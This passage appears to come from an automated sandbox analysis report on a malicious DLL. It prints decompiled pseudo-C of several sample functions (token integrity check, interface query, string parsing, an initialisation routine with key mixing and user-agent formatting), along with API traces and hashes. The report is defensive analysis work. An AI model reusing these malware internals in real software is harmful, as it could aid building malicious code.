                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04BF9499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04BF94B7
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 2d6888b17ab681528d425253eec64bfd7da145660d3296f0b05a3672ecd72050
                                          • Instruction ID: 8174f135c2633aef4f9918af43e2628702a3ec6632f4d996a331c78c4b408aba
                                          • Opcode Fuzzy Hash: 2d6888b17ab681528d425253eec64bfd7da145660d3296f0b05a3672ecd72050
                                          • Instruction Fuzzy Hash: 0631F8B1A00209EFDB20DFB9DC80AAEFBF9FB54204B5144AAE509D7210D734EE459B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF53E3, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E04BF53E3(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4bfd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04BF58BE(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04BF147E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                          0x04bf53f0
                                          0x04bf53f7
                                          0x04bf53fe
                                          0x04bf5412
                                          0x04bf541d
                                          0x04bf5435
                                          0x04bf5442
                                          0x04bf5445
                                          0x04bf544a
                                          0x04bf5455
                                          0x04bf5459
                                          0x04bf5468
                                          0x04bf546c
                                          0x04bf5488
                                          0x04bf5488
                                          0x04bf548c
                                          0x04bf548c
                                          0x04bf5491
                                          0x04bf5495
                                          0x04bf549b
                                          0x04bf549c
                                          0x04bf54a3
                                          0x04bf54a9

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04BF5415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04BF5435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04BF5445
                                          • CloseHandle.KERNEL32(00000000), ref: 04BF5495
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04BF5468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04BF5470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04BF5480
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 429eb3f5fa92f3051ea94fe14e3a589e8d8e007fc5327be3a8398ab61a40e469
                                          • Instruction ID: e69e0b9d001cb8ee4c694e8e0b7da839650a43031b091f9f49398222699b507e
                                          • Opcode Fuzzy Hash: 429eb3f5fa92f3051ea94fe14e3a589e8d8e007fc5327be3a8398ab61a40e469
                                          • Instruction Fuzzy Hash: 78213975900218FFEB109FA4DC84EAEBBBDEB48304F0040A6EA15A7251C7759E45EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BFA060, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 4bfa060-4bfa0a6 SysAllocString 187 4bfa0ac-4bfa0d9 186->187 188 4bfa1ca-4bfa1ce 186->188 194 4bfa0df-4bfa0eb call 4bfa872 187->194 195 4bfa1c8 187->195 189 4bfa1d9-4bfa1dd 188->189 190 4bfa1d0-4bfa1d3 SafeArrayDestroy 188->190 192 4bfa1df-4bfa1e2 SysFreeString 189->192 193 4bfa1e8-4bfa1ee 189->193 190->189 192->193 194->195 198 4bfa0f1-4bfa101 194->198 195->188 198->195 200 4bfa107-4bfa12d IUnknown_QueryInterface_Proxy 198->200 200->195 202 4bfa133-4bfa147 200->202 204 4bfa149-4bfa14d 202->204 205 4bfa186-4bfa18b 202->205 204->205 208 4bfa14f-4bfa166 StrStrIW 204->208 206 4bfa1bf-4bfa1c4 205->206 207 4bfa18d-4bfa192 205->207 206->195 207->206 211 4bfa194-4bfa19f call 4bf1295 207->211 209 4bfa17d-4bfa180 SysFreeString 208->209 210 4bfa168-4bfa171 call 4bf91b5 208->210 209->205 210->209 216 4bfa173-4bfa17b call 4bfa872 210->216 215 4bfa1a4-4bfa1a8 211->215 215->206 217 4bfa1aa-4bfa1af 215->217 216->209 219 4bfa1ba 217->219 220 4bfa1b1-4bfa1b8 217->220 219->206 220->206
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 04BFA09B
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04BFA11E
                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 04BFA15E
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BFA180
                                            • Part of subcall function 04BF91B5: SysAllocString.OLEAUT32(04BFC298), ref: 04BF9205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 04BFA1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BFA1E2
                                            • Part of subcall function 04BFA872: Sleep.KERNEL32(000001F4), ref: 04BFA8BA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                          • String ID:
                                          • API String ID: 2118684380-0
                                          • Opcode ID: 28c6f4e2d2ba46d8935f751c2bd2d4b9411e6edcd183dd4b447a64ac2d17ccda
                                          • Instruction ID: 40b23e5dd7d4bf120dfd910a06c106e1935c593ee42263a84d46792683ff8cc7
                                          • Opcode Fuzzy Hash: 28c6f4e2d2ba46d8935f751c2bd2d4b9411e6edcd183dd4b447a64ac2d17ccda
                                          • Instruction Fuzzy Hash: 4D518035500609AFDB05CFA8DC44A9EB7B6FF89740B158469EA0DDB210EB30FE19CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF7C75, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 222 4bf7c75-4bf7c88 223 4bf7c8f-4bf7c93 StrChrA 222->223 224 4bf7c8a-4bf7c8e 223->224 225 4bf7c95-4bf7ca6 call 4bf58be 223->225 224->223 228 4bf7ceb 225->228 229 4bf7ca8-4bf7cb4 StrTrimA 225->229 230 4bf7ced-4bf7cf4 228->230 231 4bf7cb6-4bf7cbf StrChrA 229->231 232 4bf7cd1-4bf7cdd 231->232 233 4bf7cc1-4bf7ccb StrTrimA 231->233 232->231 234 4bf7cdf-4bf7ce9 232->234 233->232 234->230
                                          C-Code - Quality: 54%
                                          			E04BF7C75(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04BF58BE(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x4bfc28c); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x4bfc28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}










                                          0x04bf7c80
                                          0x04bf7c84
                                          0x04bf7c86
                                          0x04bf7c87
                                          0x04bf7c8f
                                          0x04bf7c8f
                                          0x04bf7c93
                                          0x00000000
                                          0x00000000
                                          0x04bf7c8a
                                          0x04bf7c8b
                                          0x04bf7c8e
                                          0x04bf7c8e
                                          0x04bf7c9b
                                          0x04bf7ca0
                                          0x04bf7ca6
                                          0x04bf7cae
                                          0x04bf7cb4
                                          0x04bf7cb6
                                          0x04bf7cbb
                                          0x04bf7cbf
                                          0x04bf7cc1
                                          0x04bf7cc4
                                          0x04bf7ccb
                                          0x04bf7ccb
                                          0x04bf7cd1
                                          0x04bf7cd5
                                          0x04bf7cd8
                                          0x04bf7cd9
                                          0x04bf7cdb
                                          0x04bf7ce3
                                          0x04bf7ce7
                                          0x04bf7ce7
                                          0x04bf7cf4

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,070D95AC,?,?,?,04BF4C85,070D95AC,?,?,?,04BF4A8B,?,?,?), ref: 04BF7C8F
                                          • StrTrimA.KERNELBASE(?,04BFC28C,00000002,?,?,?,04BF4C85,070D95AC,?,?,?,04BF4A8B,?,?,?,4D283A53), ref: 04BF7CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,04BF4C85,070D95AC,?,?,?,04BF4A8B,?,?,?,4D283A53,?), ref: 04BF7CB9
                                          • StrTrimA.SHLWAPI(00000001,04BFC28C,?,?,?,04BF4C85,070D95AC,?,?,?,04BF4A8B,?,?,?,4D283A53,?), ref: 04BF7CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 4baa4bb0ffde0f4c81d55d309a3729422caad35a58553a92cdd2ced6c18cf37b
                                          • Instruction ID: 5e4d4f01d91f4082c947b418dde3a42d03de9447297af5294f53c29ee513cbf5
                                          • Opcode Fuzzy Hash: 4baa4bb0ffde0f4c81d55d309a3729422caad35a58553a92cdd2ced6c18cf37b
                                          • Instruction Fuzzy Hash: 0501D8716053166FD2219E698C48F3BBF9CFB45A50F1105D9FA89C7240EF70E81586F4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF4908, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 235 4bf4908-4bf4922 call 4bf11af 238 4bf4938-4bf4946 235->238 239 4bf4924-4bf4932 235->239 241 4bf4958-4bf4973 call 4bf1111 238->241 242 4bf4948-4bf494b 238->242 239->238 248 4bf497d 241->248 249 4bf4975-4bf497b 241->249 242->241 243 4bf494d-4bf4952 242->243 243->241 245 4bf4adb 243->245 247 4bf4add-4bf4ae2 245->247 250 4bf4983-4bf4998 call 4bf1ec4 call 4bf1a4e 248->250 249->250 255 4bf499a-4bf499d CloseHandle 250->255 256 4bf49a3-4bf49a9 250->256 255->256 257 4bf49cf-4bf49e7 call 4bf58be 256->257 258 4bf49ab-4bf49b0 256->258 267 4bf49e9-4bf4a11 memset RtlInitializeCriticalSection 257->267 268 4bf4a13-4bf4a15 257->268 259 4bf4ac6-4bf4acb 258->259 260 4bf49b6 258->260 262 4bf4acd-4bf4ad1 259->262 263 4bf4ad3-4bf4ad9 259->263 264 4bf49b9-4bf49c8 call 4bf7827 260->264 262->247 262->263 263->247 272 4bf49ca 264->272 271 4bf4a16-4bf4a1a 267->271 268->271 271->259 273 4bf4a20-4bf4a36 RtlAllocateHeap 271->273 272->259 274 4bf4a38-4bf4a64 wsprintfA 273->274 275 4bf4a66-4bf4a68 273->275 276 4bf4a69-4bf4a6d 274->276 275->276 276->259 277 4bf4a6f-4bf4a8f call 4bf93d5 call 4bf98f7 276->277 277->259 282 4bf4a91-4bf4a98 call 4bf205b 277->282 285 4bf4a9f-4bf4aa6 282->285 286 4bf4a9a-4bf4a9d 282->286 287 4bf4abb-4bf4abf call 4bf9b6f 285->287 288 4bf4aa8-4bf4aaa 285->288 286->259 291 4bf4ac4 287->291 288->259 290 4bf4aac-4bf4ab0 call 4bf6cd3 288->290 293 4bf4ab5-4bf4ab9 290->293 291->259 293->259 293->287
                                          C-Code - Quality: 57%
                                          			E04BF4908(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04BF11AF();
				if(_t21 != 0) {
					_t59 =  *0x4bfd25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4bfd25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4bfd164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04BF1111( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4bfd2a4; // 0x24da5a8
					if( *0x4bfd25c > 5) {
						_t8 = _t26 + 0x4bfe5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4bfea05; // 0x44283a44
						_t27 = _t7;
					}
					E04BF1EC4(_t27, _t27);
					_t31 = E04BF1A4E(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x4bfd270 =  *0x4bfd270 ^ 0x81bbe65d;
						_t32 = E04BF58BE(0x60);
						 *0x4bfd324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4bfd324; // 0x70d95b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4bfd324; // 0x70d95b0
							 *_t51 = 0x4bfe845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4bfd238, 0, 0x43);
							 *0x4bfd2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4bfd25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4bfd2a4; // 0x24da5a8
								_t13 = _t58 + 0x4bfe55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4bfc28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04BF93D5( ~_v8 &  *0x4bfd270, 0x4bfd00c); // executed
								_t42 = E04BF98F7(0, _t55, _t63, 0x4bfd00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04BF205B(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04BF9B6F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E04BF6CD3(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4bfd160();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E04BF7827(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                          0x04bf4908
                                          0x04bf4912
                                          0x04bf4915
                                          0x04bf4918
                                          0x04bf491b
                                          0x04bf4922
                                          0x04bf4924
                                          0x04bf4930
                                          0x04bf4932
                                          0x04bf4932
                                          0x04bf493b
                                          0x04bf4941
                                          0x04bf4946
                                          0x04bf4960
                                          0x04bf496c
                                          0x04bf496e
                                          0x04bf4973
                                          0x04bf497d
                                          0x04bf497d
                                          0x04bf4975
                                          0x04bf4975
                                          0x04bf4975
                                          0x04bf4975
                                          0x04bf4984
                                          0x04bf4991
                                          0x04bf4998
                                          0x04bf499d
                                          0x04bf499d
                                          0x04bf49a6
                                          0x04bf49a9
                                          0x04bf49cf
                                          0x04bf49db
                                          0x04bf49e0
                                          0x04bf49e5
                                          0x04bf49e7
                                          0x04bf4a13
                                          0x04bf4a15
                                          0x04bf49e9
                                          0x04bf49ed
                                          0x04bf49f2
                                          0x04bf49f7
                                          0x04bf49fe
                                          0x04bf4a04
                                          0x04bf4a09
                                          0x04bf4a0f
                                          0x04bf4a16
                                          0x04bf4a18
                                          0x04bf4a1a
                                          0x04bf4a29
                                          0x04bf4a2f
                                          0x04bf4a34
                                          0x04bf4a36
                                          0x04bf4a66
                                          0x04bf4a68
                                          0x04bf4a38
                                          0x04bf4a38
                                          0x04bf4a3e
                                          0x04bf4a4b
                                          0x04bf4a51
                                          0x04bf4a51
                                          0x04bf4a59
                                          0x04bf4a62
                                          0x04bf4a69
                                          0x04bf4a6b
                                          0x04bf4a6d
                                          0x04bf4a74
                                          0x04bf4a81
                                          0x04bf4a86
                                          0x04bf4a8b
                                          0x04bf4a8d
                                          0x04bf4a8f
                                          0x00000000
                                          0x00000000
                                          0x04bf4a91
                                          0x04bf4a96
                                          0x04bf4a98
                                          0x04bf4a9f
                                          0x04bf4aa3
                                          0x04bf4aa6
                                          0x04bf4abb
                                          0x04bf4abf
                                          0x04bf4ac4
                                          0x00000000
                                          0x04bf4ac4
                                          0x04bf4aa8
                                          0x04bf4aaa
                                          0x00000000
                                          0x00000000
                                          0x04bf4ab0
                                          0x04bf4ab5
                                          0x04bf4ab7
                                          0x04bf4ab9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bf4ab9
                                          0x04bf4a9c
                                          0x04bf4a9c
                                          0x04bf4a6d
                                          0x04bf49ab
                                          0x04bf49ab
                                          0x04bf49b0
                                          0x04bf4ac6
                                          0x04bf4acb
                                          0x04bf4ad3
                                          0x04bf4ad3
                                          0x00000000
                                          0x04bf4acb
                                          0x04bf49b6
                                          0x04bf49b9
                                          0x04bf49c3
                                          0x04bf49ca
                                          0x00000000
                                          0x04bf4adb
                                          0x04bf4adb
                                          0x04bf4ade
                                          0x04bf4ae2
                                          0x04bf4ae2

                                          APIs
                                            • Part of subcall function 04BF11AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,04BF4920,00000001), ref: 04BF11BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04BF499D
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • memset.NTDLL ref: 04BF49ED
                                          • RtlInitializeCriticalSection.NTDLL(070D9570), ref: 04BF49FE
                                            • Part of subcall function 04BF6CD3: memset.NTDLL ref: 04BF6CED
                                            • Part of subcall function 04BF6CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04BF6D24
                                            • Part of subcall function 04BF6CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04BF4AB5), ref: 04BF6D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04BF4A29
                                          • wsprintfA.USER32 ref: 04BF4A59
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 4c808f09f164d1617d77a38e96b3b7677b27d1c3ee45fcc8cc8b4a1491914e9f
                                          • Instruction ID: 54667ba822afae00a15c4e1e1329c0d3942c83972435d82c5610b75dcbd5971c
                                          • Opcode Fuzzy Hash: 4c808f09f164d1617d77a38e96b3b7677b27d1c3ee45fcc8cc8b4a1491914e9f
                                          • Instruction Fuzzy Hash: 2B517371B00219AFEB21EBB4DC44B6F77ACEB14704F144596E70ED7240E674F9498BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF6CD3, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E04BF6CD3(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x4bfd2a4; // 0x24da5a8
				_t5 = _t40 + 0x4bfee24; // 0x410025
				_t90 = E04BF4814(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E04BF147E(_v88);
					goto L24;
				}
				if(E04BF9138(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E04BFA5E9(0,  *0x4bfd33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0x4bfd2a4; // 0x24da5a8
					_t11 = _t52 + 0x4bfe81a; // 0x65696c43
					_t55 = E04BFA5E9(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
						_t81 = E04BF74B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
						E04BF147E(_t93);
					}
					if(_t81 != 0) {
						L17:
						E04BF147E(_v92);
						L19:
						_t92 = _v96;
						if(_v96 != 0) {
							E04BF568A(_t92);
						}
						goto L22;
					} else {
						if(( *0x4bfd260 & 0x00000001) == 0) {
							L14:
							E04BF6E92(_t81, _v60, _v56,  *0x4bfd270, 0);
							_t81 = E04BF6737(_v72,  &_v64,  &_v60, 0);
							if(_t81 == 0) {
								_v68 = _v96;
								_v64 =  &_v60;
								_t81 = E04BF72F2( &_v84, 0);
							}
							E04BF147E(_v60);
							goto L17;
						}
						_t67 =  *0x4bfd2a4; // 0x24da5a8
						_t18 = _t67 + 0x4bfe823; // 0x65696c43
						_t70 = E04BFA5E9(0, _t18);
						_t95 = _t70;
						if(_t70 == 0) {
							_t81 = 8;
						} else {
							_t22 =  &_v96; // 0x65696c43
							_t81 = E04BF74B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
							E04BF147E(_t95);
						}
						if(_t81 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}




























                                          0x04bf6ce9
                                          0x04bf6ced
                                          0x04bf6cf4
                                          0x04bf6cfc
                                          0x04bf6cfd
                                          0x04bf6cfe
                                          0x04bf6cff
                                          0x04bf6d00
                                          0x04bf6d01
                                          0x04bf6d09
                                          0x04bf6d15
                                          0x04bf6d17
                                          0x04bf6d1d
                                          0x04bf6e86
                                          0x04bf6e87
                                          0x04bf6e8f
                                          0x04bf6e8f
                                          0x04bf6d2f
                                          0x04bf6d37
                                          0x04bf6e78
                                          0x04bf6e79
                                          0x04bf6e7d
                                          0x00000000
                                          0x04bf6e7d
                                          0x04bf6d4a
                                          0x04bf6d4c
                                          0x04bf6d4c
                                          0x04bf6d58
                                          0x04bf6d5d
                                          0x04bf6d63
                                          0x04bf6e66
                                          0x00000000
                                          0x04bf6d69
                                          0x04bf6d69
                                          0x04bf6d6e
                                          0x04bf6d77
                                          0x04bf6d7c
                                          0x04bf6d85
                                          0x04bf6dac
                                          0x04bf6d87
                                          0x04bf6da1
                                          0x04bf6da3
                                          0x04bf6da3
                                          0x04bf6daf
                                          0x04bf6e59
                                          0x04bf6e5d
                                          0x04bf6e67
                                          0x04bf6e67
                                          0x04bf6e6d
                                          0x04bf6e6f
                                          0x04bf6e6f
                                          0x00000000
                                          0x04bf6db5
                                          0x04bf6dbc
                                          0x04bf6e01
                                          0x04bf6e14
                                          0x04bf6e2d
                                          0x04bf6e31
                                          0x04bf6e37
                                          0x04bf6e3f
                                          0x04bf6e4e
                                          0x04bf6e4e
                                          0x04bf6e54
                                          0x00000000
                                          0x04bf6e54
                                          0x04bf6dbe
                                          0x04bf6dc3
                                          0x04bf6dcc
                                          0x04bf6dd1
                                          0x04bf6dd5
                                          0x04bf6dfc
                                          0x04bf6dd7
                                          0x04bf6de7
                                          0x04bf6df1
                                          0x04bf6df3
                                          0x04bf6df3
                                          0x04bf6dff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04bf6dff
                                          0x04bf6daf

                                          APIs
                                          • memset.NTDLL ref: 04BF6CED
                                            • Part of subcall function 04BF4814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04BF6D15,00410025,00000005,?,00000000), ref: 04BF4825
                                            • Part of subcall function 04BF4814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04BF4842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04BF6D24
